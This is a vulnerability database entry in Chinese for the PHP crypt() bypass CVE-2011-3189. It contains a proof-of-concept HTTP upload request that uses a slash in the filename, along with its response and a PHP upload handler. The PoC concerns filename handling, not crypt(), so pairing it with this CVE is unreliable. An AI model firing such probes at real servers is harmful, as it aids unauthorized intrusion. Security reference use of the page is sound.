Lucene search
RootSSV:30077HistoryFeb 04, 2012 - 12:00 a.m.
PHP "crypt()"函数安全限制绕过漏洞
2012-02-0400:00:00
Root
www.seebug.org
15
0.014 Low
EPSS
Percentile
84.6%
BUGTRAQ ID: 49376
CVE ID: CVE-2011-3189
PHP是一种在电脑上运行的脚本语言,主要用途是在于处理动态网页,包含了命令行运行接口或者产生图形用户界面程序。
PHP在crypt()函数的实现上存在安全漏洞,攻击者可利用此漏洞绕过某些安全限制。
0
PHP PHP 5.3.7
PHP PHP 5.3.6
PHP PHP 5.3.5
厂商补丁:
PHP
目前厂商已经发布了升级补丁以修复这个安全问题,请到厂商的主页下载:
HTTP Request:
====
POST /file-upload-fuzz/recv_dump.php HTTP/1.0
host: blog.security.localhost
content-type: multipart/form-data; boundary=----------ThIs_Is_tHe_bouNdaRY_$
content-length: 200
------------ThIs_Is_tHe_bouNdaRY_$
Content-Disposition: form-data; name="contents"; filename="/anything.here.slash-will-pass";
Content-Type: text/plain
any
------------ThIs_Is_tHe_bouNdaRY_$--
HTTP Response:
====
HTTP/1.1 200 OK
Date: Fri, 27 May 2011 11:35:08 GMT
Server: Apache/2.2.14 (Ubuntu)
X-Powered-By: PHP/5.3.2-1ubuntu4.9
Content-Length: 30
Connection: close
Content-Type: text/html
/anything.here.slash-will-pass
PHP script:
=====
<?php
if (!empty($_FILES['contents'])) { // process file upload
echo $_FILES['contents']['name'];
unlink($_FILES['contents']['tmp_name']);
}
Related
nessus
nessus
PHP 5.3.7 crypt() MD5 Incorrect Return Value
2011-08-24 00:00:00
Mac OS X Multiple Vulnerabilities (Security Update 2012-001) (BEAST)
2012-02-02 00:00:00
HP System Management Homepage < 7.0 Multiple Vulnerabilities
2012-04-20 00:00:00
openvas
openvas
PHP crypt() returns only the salt for MD5
2011-08-25 00:00:00
PHP 'crypt()' Function Security Bypass Vulnerability
2011-09-07 00:00:00
prion
prion
Authentication flaw
2011-08-25 14:22:00
cve
cve
CVE-2011-3189
2011-08-25 14:22:00
ubuntucve
ubuntucve
CVE-2011-3189
2011-08-25 00:00:00
securityvulns
securityvulns
PHP multiple security vulnerabilities
2011-10-12 00:00:00
Apple OS X multiple security vulnerabilities
2012-02-03 00:00:00
APPLE-SA-2012-02-01-1 OS X Lion v10.7.3 and Security Update 2012-001
2012-02-03 00:00:00
gentoo
gentoo
PHP: Multiple vulnerabilities
2011-10-10 00:00:00